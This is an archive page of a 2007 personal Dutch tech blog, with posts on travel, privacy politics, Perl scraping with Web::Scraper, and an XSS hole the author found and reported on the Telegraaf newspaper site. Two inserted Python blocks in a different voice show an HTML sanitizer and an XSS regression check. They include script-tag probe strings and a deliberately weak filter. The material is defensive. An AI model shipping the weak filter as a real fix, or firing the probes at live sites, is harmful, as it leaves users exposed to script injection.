Selling cookie info to third-parties is a classic example of you can make money without doing evil.

Happy New Year!

2007/12/31 filed under /personal

Another year has passed (well, almost) and that means that I have to listen to Wesley Willis again (I usually do that at Christmas too, but hey, New Year's Eve is a fine time for Wesley too).

This year, I found the Wesley Willis song generator. So, let's close this year with a Wesley song on New Year's Eve!

New Years Eve with B10m by Wesley Willis

I like you a lot in the long run.
New Years Eve with B10m is very special to me.
You can really rock your ass off.
You can really get in the groove.

NEW YEARS EVE WITH B10M!!!
NEW YEARS EVE WITH B10M!!!
NEW YEARS EVE WITH B10M!!!
NEW YEARS EVE WITH B10M!!!

You can really get in the groove.
I like you well.
You really whoop Saddam Hussein's ass.
You really whoop a llama's ass.

NEW YEARS EVE WITH B10M!!!
NEW YEARS EVE WITH B10M!!!
NEW YEARS EVE WITH B10M!!!
NEW YEARS EVE WITH B10M!!!

New Years Eve with B10m is the best.
You make the joyride music.
I like you well.
You are the best in the long run.

Rock over London,
Rock on Chicago.

The heartbeat of America - that's today's Chevrolet.

Posted by: B10m | permanent link | comments (0)

Amorphis

2007/11/27 filed under /metal

Last Friday, I had the pleasure to see Insomnium, Swallow the Sun, and Amorphis (three wise bands that (hey, like me!) all have a .net domain name).

The concerts were located in Tivoli de Helling, a small venue which had amazingly good sound! Not too loud (no earplugs needed) and all the instruments could be heard fairly well.

See the photos on Flickr, or my favorite Amorphis song of all time, Drowned Maid, below (or House of Sleep, or The Castaway on Jumpcut.)

Posted by: B10m | permanent link | comments (0)

HTML::BBCode 2.0 released

2007/11/19 filed under /perl

HTML::BBCode, the module I wish I never wrote, was plagued by XSS exploits (yeah, I didn't test enough), so I decided to run the HTML results it generates through the awesome module HTML::StripScripts.

Due to these changes, some methods are no longer supported (see the POD, if you care enough) and that made me bump the version up to 2.0! Woohoo! The module that initially started out with a few sprintf's now really looks like a module. Hopefully I can now ignore this module for a while and no bugs are spotted ;-)
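The approach described above (render the BBCode first, then pass the generated HTML through an allowlist filter, which is the role HTML::StripScripts plays in HTML::BBCode 2.0), shown as an added example in Python. It is not code from HTML::BBCode or HTML::StripScripts; the tag set, the allowed URL schemes and all function names are assumptions made for the illustration.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed policy for this illustration (not HTML::StripScripts' defaults).
ALLOWED_TAGS = {"b", "i", "u", "a", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style"}


def naive_bbcode_to_html(text):
    """Substitution-only renderer: raw HTML and attribute values pass through."""
    text = re.sub(r"\[(/?)(b|i|u)\]", r"<\1\2>", text)
    text = re.sub(r"\[url=([^\]]+)\](.*?)\[/url\]", r'<a href="\1">\2</a>',
                  text, flags=re.S)
    return text.replace("\n", "<br>")


def clean_url(value):
    """Return the URL if its scheme is on the allowlist, else None."""
    # Browsers ignore control characters and whitespace inside a scheme.
    cleaned = re.sub(r"[\x00-\x20]+", "", value)
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:
        return None
    return cleaned if scheme in ALLOWED_SCHEMES else None


class AllowlistSanitizer(HTMLParser):
    """Re-emit only allowlisted tags and attributes; escape all text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open = []     # allowlisted tags that are currently open
        self.skip = None   # set while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if self.skip:
            return
        if tag in DROP_WITH_CONTENT:
            self.skip = tag
            return
        if tag not in ALLOWED_TAGS:
            return  # tag dropped, its text content is kept (escaped)
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()) or value is None:
                continue  # drops on* handlers, style, and so on
            url = clean_url(value)
            if url is not None:
                kept.append(f' {name}="{escape(url, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if tag == self.skip:
            self.skip = None
            return
        if tag in self.open:
            # Close anything opened after it so the output stays balanced.
            while self.open:
                closing = self.open.pop()
                self.out.append(f"</{closing}>")
                if closing == tag:
                    break

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))

    def result(self):
        while self.open:
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize_html(html):
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return parser.result()


def render_bbcode(text):
    """Render, then filter: the renderer's output is never trusted as-is."""
    return sanitize_html(naive_bbcode_to_html(text))


if __name__ == "__main__":
    # Constructed sample posts.
    for post in ("[b]hi[/b]",
                 "[url=javascript:void(0)]x[/url]",
                 'hello <script>var constructed = 1;</script>[i]world[/i]'):
        print(repr(post), "->", repr(render_bbcode(post)))
```

Because the filter runs on the renderer's output, it also covers markup the renderer never meant to produce, such as raw HTML typed into a post or an extra attribute smuggled in through a `[url=...]` value.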

Posted by: B10m | permanent link | comments (0)

Stopped Smoking

2007/10/28 filed under /personal

It's been a while since my last post and there are really three reasons for this:

  • I've started blogging for GeekBlok
  • I've been quite busy with school (yeah, I study ... again)
  • I've stopped smoking

The last reason may seem odd, but beating the habit seems to have major effects on my moods (sorry San and the guys at work!). It's making me fairly cranky, which makes me feel less like filling this blog.

For some reason, when you stop smoking, people immediately ask you one question: "Why do you quit?"

Ok, I can see that there can be multiple things pushing you this way, but it's really quite simple. Smoking seems to be fairly bad for your health! C'mon, even smokers know it ;-)

But the real question usually means: "what triggered you to do it now?"

Well, recently, the bad health effects of smoking came very close. Friends and family... I see the negative effects coming closer and closer. So yeah, that's the biggest trigger. As for motivation, health and money are the main reasons.

After some small calculations, I found out that I can pay for a three week vacation to Indonesia if I quit for a year. But since that is too far away to directly motivate me, I'm taking smaller chunks.

I have quit for two weeks now and have saved the money I usually spend on smokes. Today I decided to spend one week's worth of it on a new headset, the Sennheiser HD 457.

Can't wait for it to arrive! :-)

Posted by: B10m | permanent link | comments (0)

Geekblok

2007/10/08 filed under /web

This weekend, fellow blogger BOK and I decided to launch a new blog. Blom + BOK = BLOK, and being two geeks, geekblok was the best name we could come up with.

Within 24 hours, the blo[gk] was launched and the first post was made. Keep an eye out for web2.0/technical posts on there!

At this moment, the blog is still in development, so if you get some errors, please try again later.

URL: http://geekblok.com/

Posted by: B10m | permanent link | comments (0)

The face of anonymity

2007/09/29 filed under /web

The web is getting one big social spot where we can define our friends (read: complete strangers) over and over again. Luckily for those who are terrible at remembering names, the ability to upload a picture or avatar is usually given.

But what happens when you don't want to upload a picture and want to remain semi-anonymous? You'll get the default image! They all look very similar (well, most of them), yet all slightly different.

I've scanned a few sites and looked for their way of giving the anonymous user a face. Here are 15 examples (all scaled down to 48×48 pixels).

43things.com digg.com facebook.com flickr.com friendster.com
gofish.com jumpcut.com last.fm myspace.com newsvine.com
technorati.com vox.com Y! Answers Y! Movies youtube.com

Can't we get one global symbol for mr/mrs Anonymous?

Posted by: B10m | permanent link | comments (0)

reCAPTCHA

2007/09/26 filed under /web

Sometimes, little Perl modules on CPAN can bring you to nice websites. In this case the website of reCAPTCHA.

The website opens bravely with the tagline STOP SPAM. READ BOOKS. In this day and age of text message (SMS) language where everything has to be as short as possible, reCAPTCHA scores fairly well with their motto. But if you do take the time to look a little further than that, you see the great concept behind the website.

What is a CAPTCHA? reCAPTCHA defines it as:

A CAPTCHA is a program that can generate and grade tests that humans can pass but current computer programs cannot. For example, humans can read distorted text [...], but current computer programs can't.

The term CAPTCHA (for Completely Automated Turing Test To Tell Computers and Humans Apart) was coined in 2000 by Luis von Ahn, Manuel Blum, Nicholas Hopper and John Langford of Carnegie Mellon University. At the time, they developed the first CAPTCHA to be used by Yahoo.

In the past, I have shown my disagreement with the whole CAPTCHA movement on this blog, for I still believe CAPTCHAs are horribly annoying. But since they are everywhere now, why not use it for a good cause? reCAPTCHA just did that!

reCAPTCHA will show you an image they received out of an OCR process. This word, unidentified by the OCR, is fed to the user and this way, the user is helping to digitize a book. This is in short what they do. Please do read their learn more page and see why this is a really awesome concept!

Posted by: B10m | permanent link | comments (1)

Big Brother Awards 2007

2007/09/23 filed under /news

Every year, the Big Brother Awards are given to persons, companies and governmental organizations that blatantly violate, ignore or disregard privacy. Of course, the name of the award is taken directly out of Orwell's 1984 (as is the image of the award itself, I assume ;-)

I, as one of the last Mohicans who value privacy over terrorism FUD safety, was pleased to see the results of the category "Persons". This year, the award went to "the Dutch citizen". The jury felt the Dutch citizens were the biggest threat to their own privacy out of disinterest and the "I've got nothing to hide" point of view.

Wholeheartedly I applaud this award, for I have claimed for years that no one cares about privacy anymore. Only a few people see that PGP/GPG encrypted mail is useful, regardless of having something to hide. People dump their entire life on facebook, myspace or any of the other completely useless sites and people just don't seem to care (or even know about) data retention proposals and/or laws. A lot of people don't care about mandatory identification laws and the list goes on and on.

I accept the award on behalf of my uninterested countrymen. Hopefully it does make the news (besides the geeky RSS feeds ;-)

Posted by: B10m | permanent link | comments (2)

Tour de Telegraaf

2007/09/15 filed under /personal

Recently I discovered an XSS hole and got invited for a tour of the building ("de Telegraaf" is one of the major newspapers in the Netherlands; founded in 1893). Unfortunately the presses weren't pressing any papers when I was there, so I have to come back for that tour some day.

I did however get to see the data center of de Telegraaf. Not sure of what to expect, I went over there and was warmly welcomed. I got my official "thank you" for pointing out the hole (which got patched rather fast!). After a brief chat, I was allowed in the many halls packed with servers, backup tape robots and all the goodie blinking leds. I was surprised by the volume of servers and network connections (mostly fiber, of course).

All in all I had a great time walking through the data center, chatting with the technicians and have to conclude that the IT department of the Telegraaf took my discovery very well. The tour and friendliness have made me rethink my opinion of the newspaper. I still don't think it's a good newspaper, yet at least it's a nice bunch of folks! ;-)

Posted by: B10m | permanent link | comments (4)

Scraping Yahoo! Search with Web::Scraper

2007/09/02 filed under /perl

Scraping websites is usually pretty boring and annoying, but for some reason it always comes back. Tatsuhiko Miyagawa comes to the rescue! His Web::Scraper makes scraping the web easy and fast.

Since the documentation is scarce (there are the POD and the slides of a presentation I missed), I'll post this blog entry in which I'll show how to effectively scrape Yahoo! Search.

First we'll define what we want to see. We're going to run a query for 'Perl'. From that page, we want to fetch the following things:

  • title (the linked text)
  • url (the actual link)
  • description (the text beneath the link)

So let's start our first little script:

use Data::Dumper;
use URI;
use Web::Scraper;

my $yahoo = scraper {
   process "a.yschttl", 'title' => 'TEXT', 'url' => '@href';
   process "div.yschabstr", 'description' => "TEXT";

   result 'description', 'title', 'url';
};

print Dumper $yahoo->scrape(URI->new("http://search.yahoo.com/search?p=Perl"));

Now what happens here? The important stuff can be found in the process statements. Basically, you may translate those lines to "Fetch an A-element with the CSS class named 'yschttl' and put the text in 'title', and the href value in 'url'. Then fetch the text of the div with the class named 'yschabstr' and put that in 'description'."

The result looks something like this:

$VAR1 = {
          'url' => 'http://www.perl.com/',
          'title' => 'Perl.com',
          'description' => 'Central resource for Perl developers. It contains the Perl Language, edited by Tom Christiansen, and the Perl Reference, edited by Clay Irving.'
        };

Fun and a good start, but hey, do we really get only one result for a query on 'Perl'? No way! We need a loop!

The slides tell you to append '[]' to the key, to enable looping. The process lines then look like this:

   process "a.yschttl", 'title[]' => 'TEXT', 'url[]' => '@href';
   process "div.yschabstr", 'description[]' => "TEXT";

And when we run it now, the result looks like this:

$VAR1 = {
          'url' => [
                     'http://www.perl.com/',
                     'http://www.perl.org/',
                     'http://www.perl.com/download.csp',
                   ...
                   ],
          'title' => [
                       'Perl.com',
                       'Perl Mongers',
                       'Getting Perl',
                     ...
                     ],
          'description' => [
                             'Central resource for Perl developers. It contains the Perl Language, edited by Tom Christiansen, and the Perl Reference, edited by Clay Irving.',
                             'Nonprofit organization, established to support the Perl community.',
                             'Instructions on downloading a Perl interpreter for your computer platform. ... On CPAN, you will find Perl source in the /src directory. ...',
                           ...
                           ]
        };

That looks a lot better! We now get all the search results and could loop through the different arrays to get the right title with the right url. But still we shouldn't be satisfied, for we don't want three arrays, we want one array of hashes! For that we need a little trickery; we need another process line! All the stuff we grab already is located in a big ordered list (the OL-element), so let's find that one first, and for each list element (LI) find our title, url and description. For this we don't use the CSS selectors, but we'll go for the XPath selectors (heck, we can do both, so why not?).

To grab an XPath I really suggest Firebug, a Firefox add-on. With the easy point and click interface, you can grab the path within seconds.

use Data::Dumper;
use URI;
use Web::Scraper;

my $yahoo = scraper {
   process "/html/body/div[5]/div/div/div[2]/ol/li", 'results[]' => scraper {
      process "a.yschttl", 'title' => 'TEXT', 'url' => '@href';
      process "div.yschabstr", 'description' => "TEXT";

      result 'description', 'title', 'url';
   };
   result 'results';
};

print Dumper $yahoo->scrape( URI->new("http://search.yahoo.com/search?p=Perl") );

You see that we switched our title, url and description fields back to the old notation (without []), for we don't want to loop those fields. We've moved the looping a step higher, being to the li-elements. Then we open another scraper which will dump the hashes into the results array (note the '[]' in 'results[]').

The result is exactly what we wanted:

$VAR1 = [
          {
            'url' => 'http://www.perl.com/',
            'title' => 'Perl.com',
            'description' => 'Central resource for Perl developers. It contains the Perl Language, edited by Tom Christiansen, and the Perl Reference, edited by Clay Irving.'
          },
          {
            'url' => 'http://www.perl.org/',
            'title' => 'Perl Mongers',
            'description' => 'Nonprofit organization, established to support the Perl community.'
          },
          {
            'url' => 'http://www.perl.com/download.csp',
            'title' => 'Getting Perl',
            'description' => 'Instructions on downloading a Perl interpreter for your computer platform. ... On CPAN, you will find Perl source in the /src directory. ...'
          },
...
        ];

Again Tatsuhiko impresses me with a Perl module. Well done! Very well done!


Update: Tatsuhiko had some wise words on this article:

A couple of things:

You might just skip result() stuff if you're returning the entire hash, which is the default. (The API is stolen from Ruby's one that needs result() for some reason, but my perl port doesn't require) Now with less code :)

The use of nested scraper in your example seems pretty good, but using hash reference could be also useful, like:

my $yahoo = scraper {
   process "a.yschttl", 'results[]', {
      title => 'TEXT', url => '@href',
   };
};

This way you'll get title and url from TEXT and @href from a.yschttl, which would be handier if you don't need the description. TIMTOWTDI :)

Posted by: B10m | permanent link | comments (2)

XSS'ing the Telegraaf

2007/08/25 filed under /web

De Telegraaf is by some considered as a trustworthy source of news. It's a website from one of the biggest newspapers in the Netherlands and, like so many other big websites, not XSS-safe.

After showing my new co-workers my eBay XSS adventure, I thought it would be nice to go see what else is out there. Heck, it's been almost a year!

My first try was this newspaper and boom, there we go. Within minutes I had some of my own text on the website and after fixing a thing or two, it also worked in Microsoft's Internet Explorer.

Since the newspaper is in Dutch, I figured my article had to be in Dutch as well and I basically copied the Webwereld article which talks about the eBay exploit (which was way more nasty and fun, but oh well).

Roughly it's talking about a Dutch guy finding the XSS leak in the website, while complaining about the security of this big "professional" website. And of course, it'll show you your telegraaf.nl cookie(s).

Click on the image to see the full size (and I apologize, for I don't know how to capture the Flash advertising on the site ;-)

The live version, if the site is still unpatched, can be viewed through my not too nicely crafted URL.


Update: the URL above is no longer working, for the Telegraaf patched it. Unfortunately, a patch was preferred over a full solution, for the XSS hole is still open!

And welcome Webwereld readers!


Update: Finally the Telegraaf is encoding user's input on search queries! It seems like they've closed this XSS hole now.

Too bad they did not respond to my email at all. A simple reply like "we're looking into it" would be nice. Guess I'll have the police at my door soon ;-)
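A regression check for the kind of fix described in the updates above, as an added Python example that is not the Telegraaf's code. The template, the /search path and the "filtered" variant are assumptions: the page does not describe the site's markup or what the first patch did. The check renders the page for a harmless query and for a probe, and flags any change in the page's element and attribute outline.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import quote

# Hypothetical results template: the query lands in an attribute value,
# in element text, and in a URL query string.
TEMPLATE = (
    '<form action="/search"><input name="q" value="{attr}"></form>\n'
    "<h1>Results for {text}</h1>\n"
    '<a href="/search?q={url}&amp;page=2">next</a>\n'
)


def render_filtered(query):
    """Assumed partial fix: delete one known-bad tag, echo the rest verbatim."""
    kept = re.sub(r"(?i)</?script[^>]*>", "", query)
    return TEMPLATE.format(attr=kept, text=kept, url=kept)


def render_encoded(query):
    """Encode for each output context at the point of output."""
    return TEMPLATE.format(
        attr=escape(query, quote=True),    # inside a quoted attribute
        text=escape(query, quote=False),   # inside element text
        url=quote(query, safe=""),         # inside a URL query parameter
    )


class Outline(HTMLParser):
    """Collect (tag, attribute names) for every start tag on the page."""

    def __init__(self):
        super().__init__()
        self.items = []

    def handle_starttag(self, tag, attrs):
        self.items.append((tag, tuple(sorted(name for name, _ in attrs))))


def outline(page):
    parser = Outline()
    parser.feed(page)
    parser.close()
    return parser.items


def structure_changed(render, query, baseline="perl"):
    """True if the query altered the page's elements or attributes."""
    return outline(render(query)) != outline(render(baseline))


if __name__ == "__main__":
    # Constructed probes: markup only, no script.
    for probe in ("<script>x</script>", '"><b>probe</b>'):
        for render in (render_filtered, render_encoded):
            print(render.__name__, repr(probe),
                  "structure changed:", structure_changed(render, probe))
```

The filtered variant passes for the one token it removes and fails for the second probe, while the encoded variant keeps the same outline for both.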


Posted by: B10m | permanent link | comments (6)

We have the Wii!

2007/08/14 filed under /personal

Yesterday, I saw the Nintendo Wii for the first time at a birthday party and after playing for some time, I decided I really needed a Wii too! So today I went out and bought myself one. It's so much fun!

I can't believe the controls. They do work amazingly well. This definitely will be the way consoles will (or should) all work in the future. Think of it as Duck Hunt (also Nintendo (?)) but working good.

The Wii games you get with the machine (tennis, baseball, bowling, boxing and golf) are already fun. Can't wait to explore more games.

Definitely a good source of fun! Highly recommended.

Here's an action pose ;-)

Posted by: B10m | permanent link | comments (2)

Dutch MP Wilders and Google's Tiananmen Square

2007/08/08 filed under /web, /news

We all know that Google censors the content for our Chinese friends. A simple query for tiananmen square on different google servers shows you the difference. But what some of you may not know (I stumbled upon it only today) is that Google censors not just based on domain name (google.com vs google.cn) but also on language.

Let's look at the German domain, first without language settings:

Now just add &hl=zh-CN behind the URL and Tank Man has disappeared (mostly, the images now fall through the cracks of the google filters now and then).

The reason for this was a burst of ignorance and stupidity by one of our members of parliament, Geert Wilders. He's notorious for his ignorant proposals like calling the immigration of Muslims a "tsunami of Islamisation" and of course he wanted a ban on burqas.

But today he went completely berserk and deemed it necessary to propose a ban of the Qur'an, just like we still have a ban on Hitler's "Mein Kampf". But he wanted to take it a step further. He wanted to make it illegal to even possess a copy of the Qur'an. Yeah ... and the best part, his party is called "Party for Freedom". Freedom for white, Christian males, that is (probably).

Not soon after, reports were filed with the police for insulting a section of the community. Let's see if that works.

I always find it very strange that a Party for Freedom wants to ban so many things. Banning books is like being Google in China. Do we really want that? I doubt it.

Posted by: B10m | permanent link | comments (0)

CIA protecting US soldiers in the Netherlands

2007/07/19 filed under /news

The 4day march is an annual four day event (the name kind of gives that away) in the Netherlands. This joyful happening attracts visitors from all over the globe. People from many countries come to the city of Nijmegen to walk ... and walk ... and walk.

For years, soldiers from many countries walk this route too. Recently, however, the Dutch daily newspaper Algemeen Dagblad reported about armed CIA and DIA presence. These secret service officials were walking along to protect the 65 participating US soldiers. The 936 British and 1713 Dutch troops do leave security to the Dutch authorities.

The Netherlands, a sovereign state, clearly does not allow foreign armed forces within its borders, yet for the US officials, an exception seems to be in place, according to the newspaper's internal sources in the Ministry of Justice.

Not long after the article was posted, an online news website (nu.nl) posted an article with the response of the Ministry of Justice. The spokesman claims to have no knowledge of the presence of CIA/DIA officials, nor does he deny it. He tells us the US indeed has to ask permission first, which clearly never arrived at the ministry. The request for an investigation was dismissed by a simple "we've already investigated it".

Investigations, especially from government bodies, take a long time, yet in this case, the Ministry of Justice was able to investigate this delicate matter within hours. Leaving me with the thought that at most the ambassador was questioned briefly. Unfortunately, the results and facts of this investigation are nowhere to be found.

I might be biased, but the investigative qualities of this body aren't the greatest. The invasion of airplanes by CIA planes to Balkan CIA prisons was never really caught and I can probably list numerous accounts of such incompetence.

After these newspaper entries, the media has completely moved along. Either no one cares about this grave invasion by US officials, or there is really nothing more to report. I however do not like the deafening silence and called upon my political party to get more information. Hopefully they will succeed, but seeing the recent trend of unsolved mysteries (like blocked investigations to the real reason why the Dutch participated in the war on Iraq), I doubt they will be able to do much.

Let's see if I myself, as a concerned citizen, can pry some information out of the Ministry of Justice or the US embassy.

Hopefully to be continued!

Update: I just emailed the Ministry of Justice, asking for the findings and conclusions of the investigation. The part that is still unclear to me is that they cannot deny CIA presence, nor confirm it. What did they investigate then?

Posted by: B10m | permanent link | comments (0)

Bloglines Filter

2007/07/16 filed under /web

Ok, I've completely had it with Paris Hilton, the stupid iPhone and even more with Second Life! (... and I know I'm not the only one ;-)

Luckily there's a Greasemonkey script to filter your bloglines entries, called Mental health through ignorance. This nice hack hides the entries based on regexps you predefine. Just what I need! No more Paris Hilton, iPhone nor Second Life for me!

Posted by: B10m | permanent link | comments (0)

Generate RSS from websites

2007/07/16 filed under /news

I can't believe how I was able to keep track of the news and sites in the pre-RSS era. I truly am addicted to RSS feeds and find myself quite lost if a site doesn't offer a feed.

A site I want to track, but rarely do, is The Jakarta Post. They don't have an RSS feed (or at least I couldn't find it), so I thought of scraping it myself and building a feed, like I did with Fokke & Sukke.

Then I remembered there were services out there that did this for you and one of them is Feed43. Within a minute or so, I had my Jakarta Post feed set up.

The site asks for the URL of the page and then for some matching rules (think of regexps, but way more simple). It's really easy to work with! Keep it in mind if you ever come across sites that don't have RSS feeds available (yet).

Posted by: B10m | permanent link | comments (0)

Braindumps

2007/07/15 filed under /blog

All bloggers know the problem: you've got a one-liner in mind. A joke, message, concern, idea too small to dedicate a blog post to, yet maybe funny enough to post somewhere.

B10[m|g] now has a special place for such braindumps (for you RSS feed readers, check out the blog and look right below the header image ;-)

I'll try to update this as often as possible!

Posted by: B10m | permanent link | comments (0)

PHP coders are the worst

2007/07/07 filed under /php

I've ranted about the horrible PHP in the past enough so I won't yell at it for too much this time. In this post, I'd just like to point out the way of thinking of some (if not most) PHP coders.

As a big Flickr fan, I follow the discussion boards on API usage (I use the Flickr API myself at my Invitr project).

Yesterday, this guy posted the following:

Uploaded some new pics to a set yesterday. They showed up on our flickr page here, but not on our external site. Then this morning I go to check and see if they are visible yet, and I'm greeted with the following error:

Notice: unserialize() [function.unserialize]: Error at offset 0 of 1171 bytes in /home/content/s/g/t/sgtattoo/html/includes/phpFlickr.php on line 238

Here is line 238 from my script:

$this->parsed_response = $this->clean_text_nodes(unserialize($this->response));

Is this one of those things that's going to suddenly start working again in a few hours, or has flickr made some changes they didn't tell us about?

I told him that he should always check and make sure that $this->response really contained the values he was hoping for, but of course, PHP programmers know better:

As far as I'm concerned, error reporting is really only there to aid in initial development. My script has worked fine for the last 6 months, and I haven't touched it since. So this is a Flickr issue, not an issue on our end.

Now this just really angers me! Error reporting is only to aid in initial development? Pffttt ... enough said. I hate PHP and its users!

Posted by: B10m | permanent link | comments (3)

Real life GTA

2007/06/30 filed under /news

BoingBoing today posted about a guy believing he was living inside the Grand Theft Auto game.

In 2001, the Journal of the Royal Society of Medicine reported that a man was imprisoned for stealing cars and assaulting people with weapons, then sent to a psychiatric facility for "acting in a bizarre manner." It turns out he thought he was playing Grand Theft Auto (the article doesn't say it was GTA, but what other game could it be?)

Being an extreme fan of GTA San Andreas, I can share this guy's weird thought pattern though. After countless hours stealing bikes, cars, airplanes, shooting up entire gangs, I found myself walking down the street looking for nice ramps and bikes to just jump on. Luckily I can control myself, but I can see playing these kinds of games for too long messes up your mind ;-)

That being said, the new GTA IV trailer has been launched and now I'm confused. Shall I buy the not-so-good Xbox 360 or the way-too-expensive PS3? I must have GTA IV!

Posted by: B10m | permanent link | comments (1)

And again, more header images

2007/06/26 filed under /blog

You must get bored of my "header images" posts, but I promise from now on, they will not come by so often anymore, for I recently closed my European Tour with a visit to Berlin and Potsdam. Since Potsdam is nicer for photographers (and guys who pretend to be), the new header images only come from Potsdam (the Neues Palais and Orangerie, to be exact).





Posted by: B10m | permanent link | comments (0)

C64 Music

2007/06/19 filed under /personal

For a while now, I use Amarok and I figured I'd look at the integrated ShoutCast feeds for a while. Over there I found a feed called C64 SID Stream. A click later I was listening to the good old C64 tunes!

So I went on a quest to find more of these precious little gems (hey, if you've had a C64, this is cool! Right, Brian? ;-) A little later I found a SID Player and two search engines with more than enough cool tunes.

Ah, The Last Ninja, Impossible Mission, Defender of the Crown! Sweet nostalgia!

Posted by: B10m | permanent link | comments (2)

Tagged again

2007/06/17 filed under /personal

BOK announced yesterday that he was quite happy to finally be tagged.

After what can be considered his longest post ever (fun huh, he knows how to talk about himself ;-), he passed the tagging stuff on to me.

I, on the other hand, did remember being "tagged" before (also by BOK) so I refuse to do it again ;-)

It was fun to read my own post though. Out of all the places I'd rather be at that moment, I have not visited one! The four websites I visited daily back in January 2006, I still visit daily. Oh yeah, I did move to a new city and did get a new job...

So, sorry to say, BOK, but the tagging stops here!

Posted by: B10m | permanent link | comments (1)

Terrorism FUD

2007/06/12 filed under /personal, /random_thoughts

At the train station in Amsterdam, a big advertisement caught my attention. Since I'm not a so-called early adopter, I don't have a phone that can take pictures, so you'll have to do with my description of it, rather than a photo ;-)

The advertisement had an orange background, and in big bold letters it stated "In the Netherlands, more than 200.000 professionals work together to fight terrorism" followed by the text "What can you do?".

My initial thought was to write beneath it: "You can stop the FUD!" But of course I didn't have a big marker with me ...

200.000 professionals? Fighting together against terrorism? We don't have terrorism in this country and please stop trying to convince me that we do.

Sometimes, bad things happen in this country, of course. Floodings, explosions, huge car crashes, anything can happen, but usually, a pointless, expensive report later informs us that the authorities did not work together at all. So now I have to believe everybody is working together? Nope, I don't buy it. Besides that? Who are these professionals and who is paying them? Me? Time to visit the website. (www.nederlandtegenterrorisme.nl)

The 200.000 people include army, police, train personnel, cleaning personnel etc. They all keep their eyes open and bravely fight the terrorists. So, yep, most of them are paid by me, the tax payer.

Now the good thing is that the website offers you to download close to all publications they've made (also, probably paid for by me), except for this poster that got me angry at the train station. But oh well, let's see what we're supposed to do, according to my government. There's even an English PDF document.

The document states under the header "what can you do?" that first of all "we must not distrust eachother". Great! I love, but wait, there's more, "but we have to be vigilant". What? We have 200,000 people guarding us, but we have to be vigilant? I'll quote from the brochure:

If we all stay alert, we can reduce the chances of an attack.
  • Pay extra attention in places where there are a lot of people, such as metro and train stations, festivals, concerts and shopping centres.
  • Check where the emergency exits or escape routes are in every building you enter.
  • You might come across websites that incite hatred or violate the law in some other way. Report this at www.meldpuntcybercrime.nl.
  • Never leave your belongings unattended.

Ok, fair enough. After that it explains what should be "suspicious" and in most cases the advice given is: call the police.

My god, what happened to this country? Why should we spy on each other? Oh yeah, don't distrust each other, but do spy...

Probably the best part is that they try to justify the stupid compulsory identification act (search for it ;-)

The Compulsory Identification Act was introduced in part to prevent terrorism. Individuals aged 14 and over are required to carry a passport, driving licence or identity card with them when they are out and about. This makes it much easier to get the personal details of individuals who behave suspiciously.

Even if there was a terrorist. You think he'd carry his/her passport around?

All bullshit! The only thing you can do to stop the godforsaken government is to STOP THE FUD!

Posted by: B10m | permanent link | comments (0)

Paris, Barcelona, Rome

2007/06/03 filed under /personal

My mother-in-law is staying in the country for three months and since this is her first time in Europe, we, of course, have to travel around some. The cities I joined (for I had never been there myself) are Paris, Barcelona, Rome and Berlin. Berlin is still a few weeks away, but the other three capitals, we've visited already.

Paris

Paris, the capital of France and known for the Eiffel Tower. We took off from Amsterdam by Thalys, a high-speed train that will bring you to Paris in only a few hours.

I was not sure what to expect. Of course I have heard about all the sights and seen quite a few pictures before, yet I truly was not expecting much more than the Eiffel Tower and Arc de Triomphe. What a big mistake! Paris has so much more to offer, for example the "Sacré-Coeur", and of course the awesome "Notre Dame".

Sacré-Coeur Notre Dame

We had awesome weather, which made everything very impressive and cool. Definitely a city to return to some day!

Barcelona

Home of Gaudi, the modernist architecture, this city didn't attract me much in the beginning. I'm not a big fan of the modernism, and thus I didn't like the "Sagrada Familia" and "Casa Batllo". The Ramblas were cool however and the weather (27+ degrees Celsius all the time) made it a wonderful city trip. I did enjoy "Port Vell" and "Parc Guell" quite much.

Port Vell Parc Guell

Rome

The Eternal City; City with too much history that still is on show. Wow, am I impressed by the beauty of Rome! The Colosseum, Palatino, millions of churches, the Trevi Fountain and by far the best part: the Pantheon! Unfortunately, I was hit by the overkill factor, as I was in Egypt too. After seeing a lot of old stuff, you'll get to this "... ok, now that is enough!"

Luckily you can always grab some coffee (bring your Lonely Planet and visit the top 5 coffee places ;-).

Pantheon Fontana di Trevi

All in all, 3 very nice trips!

Posted by: B10m | permanent link | comments (0)

And more header images

2007/06/03 filed under /blog

I've returned from Barcelona and Rome so here are three more header images (well, from the Colosseum and Pantheon only) ;-)






Posted by: B10m | permanent link | comments (0)

Fawlty Towers!

2007/05/31 filed under /personal

I'm in the middle of organizing my photos on Flickr (I took around 500 pics in one week ;-) of my trip to Barcelona and Rome. This I can't help but share though.

When walking through Rome, I noticed this sign:

Hotel/Pensione Fawlty Towers

Who would ever call a hotel Fawlty Towers ?

Posted by: B10m | permanent link | comments (0)

The online services I use

2007/05/23 filed under /web

There are a lot of online services, from calendars to webmail, to to-do list software and a lot more. To give you an idea of the tools I use (and why), let's list them. You'll probably know most of them (if not all ;-)

Flickr

A Yahoo! tool for organizing (and sharing) your photos

Flickr is simply cool. It lets you store all your images and organize them by tag, date and you can even place them on a map. I always used to have my own image gallery tools on this server, yet I believe an extra backup, and the cool features are a lot more fun!

30 Boxes

A web based calendar

I'm in love with my 30 boxes account. For quite some time, I've been looking for a good tool to keep my appointments and other people's birthdays listed, and 30 boxes just suits me best. It beats all the other tools (desktop GUI based, CLI based and web based). Give it a try, you'll love it! The most important thing I love is the CLI tool by Tatsuhiko.

Bloglines

RSS reader

Choosing an RSS reader is like voting for a USA president. They all suck so you have to choose the lesser evil (take note, you US-citizens!). Bloglines sucks, I have to admit it, but I also cannot live without it anymore. Its speed and ease of use beat all the others, in my humble opinion.

HiveMinder

Online to-do list

